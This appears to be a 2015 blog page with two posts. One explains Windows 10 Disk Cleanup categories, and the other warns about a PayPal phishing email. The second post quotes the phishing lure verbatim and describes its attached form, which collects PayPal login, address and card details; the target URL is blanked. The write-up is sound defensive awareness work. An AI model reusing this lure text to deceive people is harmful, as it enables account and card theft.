Monday, June 22, 2015

What Windows 10 Disk Cleanup Categories Should I Use?

Windows 10 Disk Cleanup has many new file deletion categories, see full list below.

How to Use

Disk Cleanup wizard detects outdated files that can be delete, so if the category appears you can select those files to be deleted. By category, I mean potential files to be deleted under the "Files to delete:" heading in the bordered box below. 

These potential files to be deleted 
will be enumerated each time you run Disk Cleanup, so the categories will change each time you run it and and be different on other computers.

Click "View Files" button to examine the files that are to be deleted in each category.

Click "Clean up system files" button to to analyze the selected drive and display what Windows system can be cleaned up. A progress bar is shown during this process. Wait for this to finish.

When done, Disk Cleanup shows the total amount of space that can be freed up. Then, in the 'Files to delete' section you see different types of files that can be deleted. 

This will include categories such as 
'Downloaded Program Files''Recycle Bin''System error' files, 'Temporary files' and others. For each category of items, you see how much space they occupy at the moment. 

New to Windows 10, are 'RetailDemo Offline Content''Windows ESD installation Files (new)' and a favourite since Win 8 'File History Files'. 
See below for a full explanation of all categories!

Recommendation:  Select all categories to delete all the files, but review the categories below for further details. 

Extra : Click 'Clean up system files' button (to save allot of gigs of space) - see below.

Detailed Explanation of all 'Files to Delete' Categories:


Files created by BranchCache service for caching data.

BranchCache is a wide area network (WAN) bandwidth optimization technology that is included in some editions of the Windows Server 2012 and Windows 8 operating systems, as well as in some editions of Windows Server 2008 R2 and Windows 7. To optimize WAN bandwidth when users access content on remote servers, BranchCache copies content from your main office or hosted cloud content servers and caches the content at branch office locations, allowing client computers at branch offices to access the content locally rather than over the WAN.

RetailDemo Offline Content (new)
Blank description

Removes content download when running in Retail Demp Mode.
"Retail Demo" mode in Windows 10 has additional content to help sell and   lock the computer in a retail store.
WARNING:Once you activate Retail Demo mode, your user account will be deleted automatically and you'll not be able to turn off the Retail Demo mode. So make sure to read the "Important things to remember" given later in this topic before activating Retail Demo mode.
File History Files (new since Win 8)Remove File History Files

File History saves copies of your files so you can get them back if they're lost or damaged. It automatically backs up files in the background and lets you restore them from a simple, time-based interface.
Game News FilesThe Game News Files facilitate delivery of the RSS feeds to your Game Library.
Game Statistics FilesThe Game Statistics Files are created to aid maintenance of various game statistics.
Game Update FilesThe Game Update Files are files created in the course of updating your Game Library Games. They are temporarily stored in a dedicated folder.
Old ChkDsk FilesCheck Disk (chkdsk) is a command line that you use to recover files from your hard disk, generally caused by surface errors due to aging, bumping and smoke, that cause bad sectors (lost data) to appear. Chkdsk recovers what it can of these sectors in files which was written over the bad sector into files ending in .CHK.
You can open and read the contents using Notepad or even better Notepad++. Often the contents are not worth keeping but they can be. Chkdsk files are indicative that a drive is starting to fail. If new bad sectors continue to appear you should replace the drive or you risk losing all your files.
FOUND.001|?:\\FOUND.002|?:\\FOUND.003|?:\\FOUND.004|?:\\FOUND.005| ?:\\FOUND.006|?:\\FOUND.007|?:\\FOUND.008|?:\\FOUND.009"
Delivery Optimization   FilesDelivery optimization files are files that were previously downloaded to your computer and can be deleted if currently unused by the Delivery Optimization service.
Files used in Delivery Optimize Management of the desktop using
the Microsoft Deployment Toolkit (MDT) and System Center Configuration Manager

Content Indexer CleanerBlank descriptionThe Windows search indexer is constantly running in the background to make file searches as quick as possible.
Temporary Setup FilesThese files should no longer be needed. They were originally created by a setup program that is no longer running.
Located in directory C:\\Windows\\msdownld.tmp|?:\\msdownld.tmp
Download Program FilesDownloaded Program Files are ActiveX controls and Java applets downloaded automatically from the Internet with you view certain pages. They are temporarily stored in the Downloaded Program Files folder on your hard disk.
Temporary Internet FilesThe Temporary Internet Files folder contains webpages stored on your hard disk for quick viewing. Your personalized settings for webpages will be left intact.
Offline Web PagesOffline pages are webpages that are stored on your computer so you can view them without being connected to the Internet. If you delete these pages now, you can still view your favorites offline later by synchronizing then. Your personalized settings for webpages will be left intact.
Debug Dump FilesFiles created by Windows.
Recycle BinThe Recycle Bin contains files you have deleted from your computer. 
Setup Log FilesFiles created by Windows.
System Error Memory Dump FilesRemove system error memory dump files.
System Error Minidump FilesRemove system error minidump files.
Temporary FilesPrograms sometimes stores temporary information in the TEMP folder. Before a program closes, it usually deleted this information. You can safely delete temporary files that have not been modified in over a week.
Temporary Sync FilesRemove Windows Media Sync files.
You can use Windows Media Player to copy music, videos, and pictures from your Player Library to a portable device, such as a compatible MP3 player. This process is called syncing. These are temp files in caches create in this process which are delete

ThumbnailsWindows keeps a copy of all your picture, video, and document thumbnails so they can be displayed quickly when you open a folder. If you delete these thumbnails, they will be automatically recreated as needed.
User File HistoryWindows stores file versions temporarily on this disk before copying them to the designated File History disk. If you delete these files, you will lose some file history.
Per User Archived Windows Error ReportFiles used for Windows Error Reporting (WER). These are logs of errors (program crashes mostly) that were reported to Microsoft by the Windows Error Reporting service.
Per User Queued Windows Error ReportFiles used for Windows Error Reporting (WER) and solution checking. 'Queued' just means that it contains error reports that haven't been sent yet for whatever reason, and as such have been stored locally on your hard disk, waiting to be sent.
System Archived Windows Error ReportSystem Archived files used for Windows Error Reporting (WER).Theseare logs of errors (system crashes) that were reported to Microsoft by the Windows Error Reporting service.
System Queued Windows Error ReportSystem files used for Windows Error Reporting (WER). 'Queued' just means that it contains error reports that haven't been sent yet for whatever reason, and as such have been stored locally on your hard disk, waiting to be sent.

'Clean up system files' button you see the following dialog box

This will include categories such as'Windows ESD Installation Files''Windows Defender'and others. 

Windows Update Cleanup only appears in the list when the Disk Cleanup wizard detects Windows updates that you don't need on your system.  This category will generally save you the greatest amount of space. All of these are okay to delete, that is the purpose of this wizard. 

Recommendation:  Carefully select categories to delete all the files, but review the categories below for further details, some have irreversible effects.

Detailed Explanation of 'Clean up system files' categories

Category Description
Windows ESD installation Files
(since Win 10)
You will need these files to Reset or Refresh your PC.
Windows ESD Files was introduced to upgrade to Windows 10, behind the scenes.
Windows ESD Files are files used for a upgrade to a new version of Windows. ESD stands for Electronic Software Delivery and delivers files in an encypted (.esd) format. This then contains a .wim file. A Windows IMage (.wim) file contains one or more compressed Windows images. Each Windows image in a .wim file contains a list of all of the components, settings, and packages available with that Windows image. Install.wim file in its turn contains everything needed for a complete Windows installation.

You can convert the Windows 10 .esd file to make your own ISO disk to upgrade any PC later!
Temporary Windows installation files Installation files used by Windows setup. These files are left over from the installation process and can be safely deleted.
Previous Windows installation(s) Files from a previous Windows installation. Files and folders that may conflict with the installation of Windows have been moved to folders named Windows.old. You can access data from the previous Windows installations in this folder.
Update package Backup Files Windows saves old versions of files that have been updated by an Update package. If you delete the files, you won't be able to uninstall the Update package later.
Windows Update Cleanup Windows keeps copies of all installed updates from Windows Update, even after installing newer versions of updates that are no longer needed and taking up space. (You might need to restart your computer.)
Device driver packages Windows keeps copies of all previously installed device driver packages from Windows Update and other sources even after installing newer versions of drivers. This task will remove older versions of drivers that are no longer needed. The most current version of each driver package will be kept.
Windows Defender Non critical files used by Windows Defender
All files in these locations will be deleted
C:\ProgramData\Microsoft\Windows Defender\LocalCopy and
ProgramData\Microsoft\Windows Defender\Support"
Files Discarded by Windows Upgrade Files from a previous Windows installation. As a precaution, Windows upgrade keeps a copy of any files that were not moved to the new version of Windows and were not identified as Windows system files. If you are sure that no user's personal files are missing after the upgrade, you can delete these files.
Windows Upgrade Log Files Windows upgrade log files contain information that can help identify and troubleshoot problems that occur during Windows installation, upgrade, or servicing. Deleting these files can make it difficult to troubleshoot installation issues.
Service Pack Backup Files Windows saves old versions of files that have been updated by a service pack. If you delete the files, you won't be able to uninstall the service pack later.

When you click OK, Disk Cleanup will prompt you to confirm that you want to permanently delete the selected files. 

If you have never done, you'll be surprised at the Gigs of space freed up. 

Sunday, June 21, 2015

Phishing Email - Your PayPal Confirmation Alert ✓

Just got hit with the "Your PayPal Confirmation Alert  ✓" phishing email.

This email is crafty since the message is email header (see bad email header here) is composed well, the reply is back to PayPal, etc. Moreover, all the image sources are from PayPal, but the real threat comes from the attached document which it asks you to fill out. 

This email will try to steal your identity on PayPal and also has a browser jack file payload. It's fairly rudimentary form and obvious, but the best deception are the most seemingly obvious. The browser jack file payload, is not obvious at all however and is a huge compromise, a top tier anti-virus program should detect like Kaspersky.

The email subject line; 

"Your PayPal Confirmation Alert  ✓"

The email reads, but the give away this is misspelling of Thank you.

Dear Customer,
This is an automatic message by the system to let you know that you have to confirm your account information within 48 hours.
Your account has been frozen temporarily in order to protect it.
The account will continue to be frozen until it is approved and validate your account information.
This will help protect you in the future. The process does not take more than 3 minutes.
To proceed to confirm your account information please follow the instructions that will be required
  1. Download the attached document and open it in a browser window secure.
  2. Confirm that you are the account holder and follow the instructions.

Tank You,

The attached document is name PayPal-Alert.htm and contains a form to direct all your personal information to be sent to this URL address...

f o r m action="" id="main" method="POST" name="main">

Action > Report the Phishing URL to Google Plex now, click this link

The attached document cleansed pre-view

PayPal ID and Password

Enter your primary email address as your Paypal ID.

Please enter your information.

Mailing Address

Please enter your mailing address.

Profile of credit card


Action > Report the Phishing URL to Google Plex now, click this link